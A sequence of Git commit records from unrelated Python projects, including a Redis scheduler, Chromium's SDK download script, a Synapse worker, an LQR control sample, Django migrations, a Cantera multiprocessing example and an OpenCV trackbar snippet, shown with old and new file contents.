scheduled_time=datetime_from_config(when, hour),
func=reset_stats_queue,
args=[queuename, when, hour],
interval=seconds_from_config_interval(when)
)
def exists_job_onqueue(queuename, when, hour):
"""
Check if a job is present on queue
"""
scheduler = Scheduler(connection=Redis())
jobs = scheduler.get_jobs()
for job in jobs:
if 'reset_stats_queue' in job.func_name:
args = job.args
if queuename == args[0] and when == args[1] and hour == args[2]:
return True
return False
def remove_jobs_not_config():
"""
Remove jobs on queue but not present on config.
Prevent when in job for reset a queue stats is scheduled but
after your config is modified or deleted
"""
scheduler = Scheduler(connection=Redis())
queue_for_reset = config.QPanelConfig().queues_for_reset_stats()
jobs = scheduler.get_jobs()
for job in jobs:
if 'reset_stats_queue' in job.func_name:
q = job.args[0]
if q not in queue_for_reset.keys():
job.delete()
def enqueue_reset_stats():
queues_for_reset = config.QPanelConfig().queues_for_reset_stats()
for queue, val in queues_for_reset.items():
job_reset_stats_queue(queue, val['when'], val['hour'])
def seconds_from_config_interval(val):
"""
Get interval value for a configuration by parameter
"""
val = val.lower()
day = 0
if val == 'daily':
day = 1
elif val in ['weekly', 'sun', 'mon', 'tue', 'wed', 'thu', 'fri' 'sat']:
day = 7
elif val == 'monthly':
day = 30
return day * 24 * 60 * 60 # day * hour * minute * seconds
def datetime_from_config(when, hour):
return datetime.datetime.utcnow()
| Python | 0.000001 | |
b0c3ed39916e25bed2900b653974672a39fcb254 | Use CHROME_HEADLESS to check if download_sdk_extras.py is running on a bot. | build/download_sdk_extras.py | build/download_sdk_extras.py | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to download sdk/extras packages on the bots from google storage.
The script expects arguments that specify zips file in the google storage
bucket named: <dir in SDK extras>_<package name>_<version>.zip. The file will
be extracted in the android_tools/sdk/extras directory on the test bots. This
script will not do anything for developers.
"""
import json
import os
import shutil
import subprocess
import sys
import zipfile
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CHROME_SRC = os.path.abspath(os.path.join(SCRIPT_DIR, os.pardir))
sys.path.insert(0, os.path.join(SCRIPT_DIR, 'android'))
sys.path.insert(1, os.path.join(CHROME_SRC, 'tools'))
from pylib import constants
import find_depot_tools
DEPOT_PATH = find_depot_tools.add_depot_tools_to_path()
GSUTIL_PATH = os.path.join(DEPOT_PATH, 'gsutil.py')
SDK_EXTRAS_BUCKET = 'gs://chrome-sdk-extras'
SDK_EXTRAS_PATH = os.path.join(constants.ANDROID_SDK_ROOT, 'extras')
SDK_EXTRAS_JSON_FILE = os.path.join(os.path.dirname(__file__),
'android_sdk_extras.json')
def clean_and_extract(dir_name, package_name, zip_file):
local_dir = '%s/%s/%s' % (SDK_EXTRAS_PATH, dir_name, package_name)
if os.path.exists(local_dir):
shutil.rmtree(local_dir)
local_zip = '%s/%s' % (SDK_EXTRAS_PATH, zip_file)
with zipfile.ZipFile(local_zip) as z:
z.extractall(path=SDK_EXTRAS_PATH)
def main():
if not os.environ.get('CHROME_HEADLESS'):
# This is not a buildbot checkout.
return 0
# Update the android_sdk_extras.json file to update downloaded packages.
with open(SDK_EXTRAS_JSON_FILE) as json_file:
packages = json.load(json_file)
for package in packages:
local_zip = '%s/%s' % (SDK_EXTRAS_PATH, package['zip'])
if not os.path.exists(local_zip):
package_zip = '%s/%s' % (SDK_EXTRAS_BUCKET, package['zip'])
subprocess.check_call(['python', GSUTIL_PATH, '--force-version', '4.7',
'cp', package_zip, local_zip])
# Always clean dir and extract zip to ensure correct contents.
clean_and_extract(package['dir_name'], package['package'], package['zip'])
if __name__ == '__main__':
sys.exit(main())
| #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to download sdk/extras packages on the bots from google storage.
The script expects arguments that specify zips file in the google storage
bucket named: <dir in SDK extras>_<package name>_<version>.zip. The file will
be extracted in the android_tools/sdk/extras directory.
"""
import json
import os
import shutil
import subprocess
import sys
import zipfile
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'android'))
from pylib import constants
GSUTIL_PATH = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir,
os.pardir, os.pardir, os.pardir, os.pardir, 'depot_tools', 'gsutil.py')
SDK_EXTRAS_BUCKET = 'gs://chrome-sdk-extras'
SDK_EXTRAS_PATH = os.path.join(constants.ANDROID_SDK_ROOT, 'extras')
SDK_EXTRAS_JSON_FILE = os.path.join(os.path.dirname(__file__),
'android_sdk_extras.json')
def clean_and_extract(dir_name, package_name, zip_file):
local_dir = '%s/%s/%s' % (SDK_EXTRAS_PATH, dir_name, package_name)
if os.path.exists(local_dir):
shutil.rmtree(local_dir)
local_zip = '%s/%s' % (SDK_EXTRAS_PATH, zip_file)
with zipfile.ZipFile(local_zip) as z:
z.extractall(path=SDK_EXTRAS_PATH)
def main():
if not os.path.exists(GSUTIL_PATH) or not os.path.exists(SDK_EXTRAS_PATH):
# This is not a buildbot checkout.
return 0
# Update the android_sdk_extras.json file to update downloaded packages.
with open(SDK_EXTRAS_JSON_FILE) as json_file:
packages = json.load(json_file)
for package in packages:
local_zip = '%s/%s' % (SDK_EXTRAS_PATH, package['zip'])
if not os.path.exists(local_zip):
package_zip = '%s/%s' % (SDK_EXTRAS_BUCKET, package['zip'])
subprocess.check_call([GSUTIL_PATH, '--force-version', '4.7', 'cp',
package_zip, local_zip])
# Always clean dir and extract zip to ensure correct contents.
clean_and_extract(package['dir_name'], package['package'], package['zip'])
if __name__ == '__main__':
sys.exit(main())
| Python | 0 |
80580b8667558e3a4034b31ac08773de70ef3b39 | Implement consumer for adjusting screen brightness. | display_control_consumer/run.py | display_control_consumer/run.py | from setproctitle import setproctitle
import json
import redis
import subprocess
import time
class DisplayControlConsumer(object):
STEP = 0.05
def __init__(self):
self.redis_instance = redis.StrictRedis()
self.env = {"DISPLAY": ":0"}
def get_brightness(self):
p = subprocess.Popen(["xrandr", "--verbose"], env=self.env, stdout=subprocess.PIPE)
(stdout, _) = p.communicate()
for line in stdout.split("\n"):
if "Brightness" in line:
return float(line.strip().split(": ")[1])
def set_brightness(self, brightness):
p = subprocess.Popen(["xrandr", "--q1", "--output", "HDMI-0", "--brightness", unicode(brightness)], env=self.env)
p.wait()
self.redis_instance.setex("display-control-brightness", 60, brightness)
def run(self):
while True:
time.sleep(1)
destination_brightness = self.redis_instance.get("display-control-destination-brightness")
if not destination_brightness:
continue
destination_brightness = float(destination_brightness)
current_brightness = self.redis_instance.get("display-control-brightness")
if current_brightness:
current_brightness = float(current_brightness)
else:
current_brightness = self.get_brightness()
self.redis_instance.setex("display-control-brightness", 60, current_brightness)
if current_brightness > destination_brightness:
# Decrease brightness. Current brightness is too large.
new_brightness = current_brightness - self.STEP
print "Decreasing brightness: %s (-> %s, currently at %s)" % (new_brightness, destination_brightness, current_brightness)
if new_brightness < destination_brightness:
# Wrapped around: new brightness is smaller than destination brightness.; no action
print "Brightness wrapped around"
self.redis_instance.delete("display-control-destination-brightness")
continue
elif current_brightness < destination_brightness:
# Increase brightness
new_brightness = current_brightness + self.STEP
print "Increasing brightness: %s (-> %s, currently at %s)" % (new_brightness, destination_brightness, current_brightness)
if new_brightness > destination_brightness:
# Wrapped around; no action
self.redis_instance.delete("display-control-destination-brightness")
continue
else:
# Already matches. No action.
self.redis_instance.delete("display-control-destination-brightness")
continue
print "Setting brightness to %s (destination: %s)" % (new_brightness, destination_brightness)
self.set_brightness(new_brightness)
self.redis_instance.publish("home:broadcast:generic", json.dumps({"key": "display_brightness", "content": new_brightness}))
def main():
setproctitle("display_control_consumer: run")
dcc = DisplayControlConsumer()
dcc.run()
if __name__ == '__main__':
main()
| Python | 0 | |
5a376ef0d49193df46fc127323bfa50376e3c968 | add lqr sample | lqr_sample/main.py | lqr_sample/main.py | #! /usr/bin/python
# -*- coding: utf-8 -*-
u"""
Linear-Quadratic Regulator sample code
author Atsushi Sakai
"""
import matplotlib.pyplot as plt
import numpy as np
import scipy.linalg as la
simTime=3.0
dt=0.1
A=np.matrix([[1.1,2.0],[0,0.95]])
B=np.matrix([0.0,0.0787]).T
C=np.matrix([-2,1])
def Observation(x):
y=C*x
ry=float(y[0])
return (ry)
def Process(x,u):
x=A*x+B*u
return (x)
def dlqr(A,B,Q,R):
"""Solve the discrete time lqr controller.
x[k+1] = A x[k] + B u[k]
cost = sum x[k].T*Q*x[k] + u[k].T*R*u[k]
"""
#ref Bertsekas, p.151
#first, try to solve the ricatti equation
X = np.matrix(la.solve_discrete_are(A, B, Q, R))
#compute the LQR gain
K = np.matrix(la.inv(B.T*X*B+R)*(B.T*X*A))
eigVals, eigVecs = la.eig(A-B*K)
return K, X, eigVals
def LQRController(x,u):
K,X,ev=dlqr(A,B,C.T*np.eye(1)*C,np.eye(1))
u=-K*x
return u
def Main():
time=0.0
u_history=[]
y_history=[]
time_history=[]
x=np.matrix([3,1]).T
u=np.matrix([0,0,0])
while time<=simTime:
u=LQRController(x,u)
u0=float(u[0,0])
x=Process(x,u0)
y=Observation(x)
u_history.append(u0)
y_history.append(y)
time_history.append(time)
time+=dt
plt.plot(time_history,u_history,"-r",label="input")
plt.plot(time_history,y_history,"-b",label="output")
plt.grid(True)
plt.xlim([0,simTime])
plt.legend()
plt.show()
if __name__ == '__main__':
Main()
| Python | 0 | |
e0b6db29ed260f4b54298c4d079f7fc6ce98a591 | Split out public room list into a worker process | synapse/app/client_reader.py | synapse/app/client_reader.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import synapse
from synapse.config._base import ConfigError
from synapse.config.homeserver import HomeServerConfig
from synapse.config.logger import setup_logging
from synapse.http.site import SynapseSite
from synapse.http.server import JsonResource
from synapse.metrics.resource import MetricsResource, METRICS_PREFIX
from synapse.replication.slave.storage._base import BaseSlavedStore
from synapse.replication.slave.storage.appservice import SlavedApplicationServiceStore
from synapse.replication.slave.storage.events import SlavedEventStore
from synapse.replication.slave.storage.keys import SlavedKeyStore
from synapse.replication.slave.storage.room import RoomStore
from synapse.replication.slave.storage.directory import DirectoryStore
from synapse.replication.slave.storage.registration import SlavedRegistrationStore
from synapse.rest.client.v1.room import PublicRoomListRestServlet
from synapse.server import HomeServer
from synapse.storage.client_ips import ClientIpStore
from synapse.storage.engines import create_engine
from synapse.util.async import sleep
from synapse.util.httpresourcetree import create_resource_tree
from synapse.util.logcontext import LoggingContext
from synapse.util.manhole import manhole
from synapse.util.rlimit import change_resource_limit
from synapse.util.versionstring import get_version_string
from synapse.crypto import context_factory
from twisted.internet import reactor, defer
from twisted.web.resource import Resource
from daemonize import Daemonize
import sys
import logging
import gc
logger = logging.getLogger("synapse.app.federation_reader")
class ClientReaderSlavedStore(
SlavedEventStore,
SlavedKeyStore,
RoomStore,
DirectoryStore,
SlavedApplicationServiceStore,
SlavedRegistrationStore,
BaseSlavedStore,
ClientIpStore, # After BaseSlavedStore because the constructor is different
):
pass
class ClientReaderServer(HomeServer):
def get_db_conn(self, run_new_connection=True):
# Any param beginning with cp_ is a parameter for adbapi, and should
# not be passed to the database engine.
db_params = {
k: v for k, v in self.db_config.get("args", {}).items()
if not k.startswith("cp_")
}
db_conn = self.database_engine.module.connect(**db_params)
if run_new_connection:
self.database_engine.on_new_connection(db_conn)
return db_conn
def setup(self):
logger.info("Setting up.")
self.datastore = ClientReaderSlavedStore(self.get_db_conn(), self)
logger.info("Finished setting up.")
def _listen_http(self, listener_config):
port = listener_config["port"]
bind_address = listener_config.get("bind_address", "")
site_tag = listener_config.get("tag", port)
resources = {}
for res in listener_config["resources"]:
for name in res["names"]:
if name == "metrics":
resources[METRICS_PREFIX] = MetricsResource(self)
elif name == "client":
resource = JsonResource(self, canonical_json=False)
PublicRoomListRestServlet(self).register(resource)
resources.update({
"/_matrix/client/r0": resource,
"/_matrix/client/unstable": resource,
"/_matrix/client/v2_alpha": resource,
"/_matrix/client/api/v1": resource,
})
root_resource = create_resource_tree(resources, Resource())
reactor.listenTCP(
port,
SynapseSite(
"synapse.access.http.%s" % (site_tag,),
site_tag,
listener_config,
root_resource,
),
interface=bind_address
)
logger.info("Synapse client reader now listening on port %d", port)
def start_listening(self, listeners):
for listener in listeners:
if listener["type"] == "http":
self._listen_http(listener)
elif listener["type"] == "manhole":
reactor.listenTCP(
listener["port"],
manhole(
username="matrix",
password="rabbithole",
globals={"hs": self},
),
interface=listener.get("bind_address", '127.0.0.1')
)
else:
logger.warn("Unrecognized listener type: %s", listener["type"])
@defer.inlineCallbacks
def replicate(self):
http_client = self.get_simple_http_client()
store = self.get_datastore()
replication_url = self.config.worker_replication_url
while True:
try:
args = store.stream_positions()
args["timeout"] = 30000
result = yield http_client.get_json(replication_url, args=args)
yield store.process_replication(result)
except:
logger.exception("Error replicating from %r", replication_url)
yield sleep(5)
def start(config_options):
try:
config = HomeServerConfig.load_config(
"Synapse client reader", config_options
)
except ConfigError as e:
sys.stderr.write("\n" + e.message + "\n")
sys.exit(1)
assert config.worker_app == "synapse.app.client_reader"
setup_logging(config.worker_log_config, config.worker_log_file)
database_engine = create_engine(config.database_config)
tls_server_context_factory = context_factory.ServerContextFactory(config)
ss = ClientReaderServer(
config.server_name,
db_config=config.database_config,
tls_server_context_factory=tls_server_context_factory,
config=config,
version_string="Synapse/" + get_version_string(synapse),
database_engine=database_engine,
)
ss.setup()
ss.get_handlers()
ss.start_listening(config.worker_listeners)
def run():
with LoggingContext("run"):
logger.info("Running")
change_resource_limit(config.soft_file_limit)
if config.gc_thresholds:
gc.set_threshold(*config.gc_thresholds)
reactor.run()
def start():
ss.get_datastore().start_profiling()
ss.replicate()
reactor.callWhenRunning(start)
if config.worker_daemonize:
daemon = Daemonize(
app="synapse-client-reader",
pid=config.worker_pid_file,
action=run,
auto_close_fds=False,
verbose=True,
logger=logger,
)
daemon.start()
else:
run()
if __name__ == '__main__':
with LoggingContext("main"):
start(sys.argv[1:])
| Python | 0.999988 | |
a3a022a184694cf95bbc37e22c4329c6b3e400cd | 566. Reshape the Matrix | python/ReshapeTheMatrix.py | python/ReshapeTheMatrix.py | # -*- coding:utf-8 -*-
# @Author zpf
"""
You're given a matrix represented by a two-dimensional array,
and two positive integers r and c representing the row number and column number of the wanted reshaped matrix, respectively.
The reshaped matrix need to be filled with all the elements of the original matrix in the same row-traversing order as they were.
If the 'reshape' operation with given parameters is possible and legal, output the new reshaped matrix;
Otherwise, output the original matrix.
Example 1: Example 2:
Input: Input:
nums = nums =
[[1,2], [[1,2],
[3,4]] [3,4]]
r = 1, c = 4 r = 2, c = 4
Output: Output:
[[1,2,3,4]] [[1,2],
[3,4]]
Note:
The height and width of the given matrix is in range [1, 100].
The given r and c are all positive.
"""
class Solution(object):
def matrixReshape(self, nums, r, c):
"""
:type nums: List[List[int]]
:type r: int
:type c: int
:rtype: List[List[int]]
"""
r1 = len(nums)
c1 = len(nums[0])
if r1 * c1 != r * c:
return nums
else:
temp = []
new_nums = []
for e in nums:
for e1 in e:
temp.append(e1)
i = 0
while i < r:
new_nums.append(temp[0 + i * c: c + i * c])
i += 1
return new_nums
if __name__ == "__main__":
sample = Solution()
print(sample.matrixReshape(nums=[[1, 2], [3, 4]], r=1, c=4))
| Python | 0.999779 | |
d83b18ec4faa513c7171a23af5ba46397141519e | add main __init__.py | wingstructure/__init__.py | wingstructure/__init__.py | from . import analysis
from . import data
from . import liftingline
from . import structure
| Python | 0.000588 | |
81df43350fdcbde85780dfbf1101e47fff04dc6c | Add missing migration | resolwe/flow/migrations/0025_set_get_last_by.py | resolwe/flow/migrations/0025_set_get_last_by.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 12:42
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('flow', '0024_add_relations'),
]
operations = [
migrations.AlterModelOptions(
name='collection',
options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_collection', 'Can view collection'), ('edit_collection', 'Can edit collection'), ('share_collection', 'Can share collection'), ('download_collection', 'Can download files from collection'), ('add_collection', 'Can add data objects to collection'), ('owner_collection', 'Is owner of the collection'))},
),
migrations.AlterModelOptions(
name='data',
options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_data', 'Can view data'), ('edit_data', 'Can edit data'), ('share_data', 'Can share data'), ('download_data', 'Can download files from data'), ('owner_data', 'Is owner of the data'))},
),
migrations.AlterModelOptions(
name='descriptorschema',
options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_descriptorschema', 'Can view descriptor schema'), ('edit_descriptorschema', 'Can edit descriptor schema'), ('share_descriptorschema', 'Can share descriptor schema'), ('owner_descriptorschema', 'Is owner of the description schema'))},
),
migrations.AlterModelOptions(
name='entity',
options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_entity', 'Can view entity'), ('edit_entity', 'Can edit entity'), ('share_entity', 'Can share entity'), ('download_entity', 'Can download files from entity'), ('add_entity', 'Can add data objects to entity'), ('owner_entity', 'Is owner of the entity'))},
),
migrations.AlterModelOptions(
name='process',
options={'default_permissions': (), 'get_latest_by': 'version', 'permissions': (('view_process', 'Can view process'), ('share_process', 'Can share process'), ('owner_process', 'Is owner of the process'))},
),
migrations.AlterModelOptions(
name='storage',
options={'default_permissions': (), 'get_latest_by': 'version'},
),
]
| Python | 0.0002 | |
7b2e28f9604347ff396b220c8d2ab7bdfdc671c8 | test hbase TSocket | test/test_hbase_TSocker0Err32/test_hbase.py | test/test_hbase_TSocker0Err32/test_hbase.py | import happybase
# gives error
# TSocket read 0 bytes
# [Errno 32] Broken pipe
if __name__ == "__main__":
conn = happybase.Connection(host="10.1.94.57")
table_name = "escorts_images_sha1_infos_dev"
hbase_table = conn.table(table_name)
batch_list_queries = ["000421227D83DA48DB4A417FCEFCA68272398B8E"]
rows = hbase_table.rows(batch_list_queries)
print rows
| Python | 0.000001 | |
6d8e47f0b1bc70de7464303d6ac3b7684588a7aa | Add mpmodel | mpmodel/mpmodel.py | mpmodel/mpmodel.py | import tensorflow as tf
| Python | 0 | |
ad6e67d382df1018e4ae55ebdcb6fae1cca9bffe | Add merge migration | osf/migrations/0081_merge_20180212_0949.py | osf/migrations/0081_merge_20180212_0949.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-02-12 15:49
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0080_ensure_schemas'),
('osf', '0079_merge_20180202_1206'),
]
operations = [
]
| Python | 0.000001 | |
ec6b65513baa4532af7cad1bd6c98e162b3db9ef | Add multiprocessing example | interfaces/cython/cantera/examples/transport/multiprocessing_viscosity.py | interfaces/cython/cantera/examples/transport/multiprocessing_viscosity.py | """
This example demonstrates how Cantera can be used with the 'multiprocessing'
module.
Because Cantera Python objects are built on top of C++ objects which cannot be
passed between Python processes, it is necessary to set up the computation so
that each process has its own copy of the relevant Cantera objects. One way to
do this is by storing the objects in (module) global variables, which are
initialized once per worker process.
"""
import multiprocessing
import numpy as np
import cantera as ct
import itertools
from time import time
# Global storage for Cantera Solution objects
gases = {}
def init_process(mech):
"""
This function is called once for each process in the Pool. We use it to
initialize any Cantera objects we need to use.
"""
gases[mech] = ct.Solution(mech)
gases[mech].transport_model = 'Multi'
def get_thermal_conductivity(args):
# Pool.imap only permits a single argument, so we pack all of the needed
# arguments into the tuple 'args'
mech, T, P, X = args
gas = gases[mech]
gas.TPX = T, P, X
return gas.thermal_conductivity
def get_viscosity(args):
# Pool.imap only permits a single argument, so we pack all of the needed
# arguments into the tuple 'args'
mech, T, P, X = args
gas = gases[mech]
gas.TPX = T, P, X
return gas.enthalpy_mass
def parallel(mech, predicate, nProcs, nTemps):
"""
Call the function ``predicate`` on ``nProcs`` processors for ``nTemps``
different temperatures.
"""
P = ct.one_atm
X = 'CH4:1.0, O2:1.0, N2:3.76'
pool = multiprocessing.Pool(processes=nProcs,
initializer=init_process,
initargs=(mech,))
y = pool.map(predicate,
zip(itertools.repeat(mech),
np.linspace(300, 900, nTemps),
itertools.repeat(P),
itertools.repeat(X)))
return y
def serial(mech, predicate, nTemps):
P = ct.one_atm
X = 'CH4:1.0, O2:1.0, N2:3.76'
init_process(mech)
y = map(predicate,
zip(itertools.repeat(mech),
np.linspace(300, 900, nTemps),
itertools.repeat(P),
itertools.repeat(X)))
return y
if __name__ == '__main__':
# For functions where the work done in each subprocess is substantial,
# significant speedup can be obtained using the multiprocessing module.
print('Thermal conductivity')
t1 = time()
parallel('gri30.xml', get_thermal_conductivity, 4, 1000)
t2 = time()
print('Parallel: {0:.3f} seconds'.format(t2-t1))
t1 = time()
serial('gri30.xml', get_thermal_conductivity, 1000)
t2 = time()
print('Serial: {0:.3f} seconds'.format(t2-t1))
# On the other hand, if the work done per call to the predicate function is
# small, there may be no advantage to using multiprocessing.
print('\nViscosity')
t1 = time()
parallel('gri30.xml', get_viscosity, 4, 1000)
t2 = time()
print('Parallel: {0:.3f} seconds'.format(t2-t1))
t1 = time()
serial('gri30.xml', get_viscosity, 1000)
t2 = time()
print('Serial: {0:.3f} seconds'.format(t2-t1))
| Python | 0.000001 | |
3fbf2c29a54225e7d4dd882637e68cfe3a4d0101 | Add some tests for Message Queue | src/cobwebs/tests/test_mq.py | src/cobwebs/tests/test_mq.py | from cobwebs.mq.core import RPCLink, TopicsLink
from cobwebs.mq.backends.rabbitmq import driver
import pytest
import spider
import json
from unittest import mock
HOST = "127.0.0.1"
def test_driver_instance():
assert isinstance(driver.rpc, RPCLink)
assert isinstance(driver.topics, TopicsLink)
@mock.patch("cobwebs.mq.backends.rabbitmq")
def test_rpc(rabbitmq):
request = {"action": "list", "data": None}
result = rabbitmq.rpc.send("db_driver", json.dumps(request), HOST)
rabbitmq.rpc.send.assert_called_with("db_driver", json.dumps(request), HOST)
@mock.patch("cobwebs.mq.backends.rabbitmq")
def test_topic(rabbitmq):
result = rabbitmq.topic.emit(key="test", message="this is just a message")
rabbitmq.topic.emit.assert_called_with(key="test",
message="this is just a message")
| Python | 0 | |
144f867f91b637ccdb6b5535646f8884099b7a2f | add missing migration to make result of "migrate" match what the model file says | lava_scheduler_app/migrations/0010_auto__chg_field_testjob_description.py | lava_scheduler_app/migrations/0010_auto__chg_field_testjob_description.py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'TestJob.description'
db.alter_column('lava_scheduler_app_testjob', 'description', self.gf('django.db.models.fields.CharField')(max_length=200, null=True))
def backwards(self, orm):
# Changing field 'TestJob.description'
db.alter_column('lava_scheduler_app_testjob', 'description', self.gf('django.db.models.fields.CharField')(max_length=200))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'lava_scheduler_app.device': {
'Meta': {'object_name': 'Device'},
'current_job': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lava_scheduler_app.TestJob']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'device_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lava_scheduler_app.DeviceType']"}),
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
'lava_scheduler_app.devicetype': {
'Meta': {'object_name': 'DeviceType'},
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True', 'db_index': 'True'})
},
'lava_scheduler_app.testjob': {
'Meta': {'object_name': 'TestJob'},
'actual_device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'+'", 'null': 'True', 'blank': 'True', 'to': "orm['lava_scheduler_app.Device']"}),
'definition': ('django.db.models.fields.TextField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'log_file': ('django.db.models.fields.files.FileField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'requested_device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'+'", 'null': 'True', 'blank': 'True', 'to': "orm['lava_scheduler_app.Device']"}),
'requested_device_type': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'+'", 'null': 'True', 'blank': 'True', 'to': "orm['lava_scheduler_app.DeviceType']"}),
'results_link': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '400', 'null': 'True', 'blank': 'True'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'submit_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'submitter': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['lava_scheduler_app']
| Python | 0.000001 | |
eca48495bdba121a0719bb442f5ec30b70233e74 | Add a snippet (Python OpenCV). | python/opencv/opencv_2/gui/opencv_trackbar.py | python/opencv/opencv_2/gui/opencv_trackbar.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Jérémie DECOCK (http://www.jdhp.org)
"""
OpenCV - Trackbar widget.
Required: opencv library (Debian: aptitude install python-opencv)
See: https://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_gui/py_trackbar/py_trackbar.html#trackbar
"""
from __future__ import print_function
import cv2 as cv
import numpy as np
import argparse
def trackbar1_cb(x):
pass
def trackbar2_cb(x):
pass
def main():
# Parse the programm options (get the path of the image file to read) #####
parser = argparse.ArgumentParser(description='An opencv snippet.')
parser.add_argument("--cameraid", "-i", help="The camera ID number (default: 0)", type=int, default=0, metavar="INTEGER")
args = parser.parse_args()
device_number = args.cameraid
# OpenCV ##################################################################
video_capture = cv.VideoCapture(device_number)
# Create a window
window_name = "Threshold Bin"
cv.namedWindow(window_name)
# Create trackbars
trackbar1_name = "Threshold"
trackbar1_window_name = window_name
trackbar1_default_value = 127
trackbar1_maximum_value = 255
trackbar1_callback_function = trackbar1_cb # Executed everytime trackbar value changes
cv.createTrackbar(trackbar1_name, trackbar1_window_name, trackbar1_default_value, trackbar1_maximum_value, trackbar1_callback_function)
trackbar2_name = "Max value"
trackbar2_window_name = window_name
trackbar2_default_value = 255
trackbar2_maximum_value = 255
trackbar2_callback_function = trackbar2_cb # Executed everytime trackbar value changes
cv.createTrackbar(trackbar2_name, trackbar2_window_name, trackbar2_default_value, trackbar2_maximum_value, trackbar2_callback_function)
print("Press q to quit.")
while(True):
# Capture frame-by-frame.
# 'ret' is a boolean ('True' if frame is read correctly, 'False' otherwise).
# 'img_np' is an numpy array.
ret, img_bgr = video_capture.read()
# IMAGE PROCESSING ################################
# Convert BGR color space to Grayscale
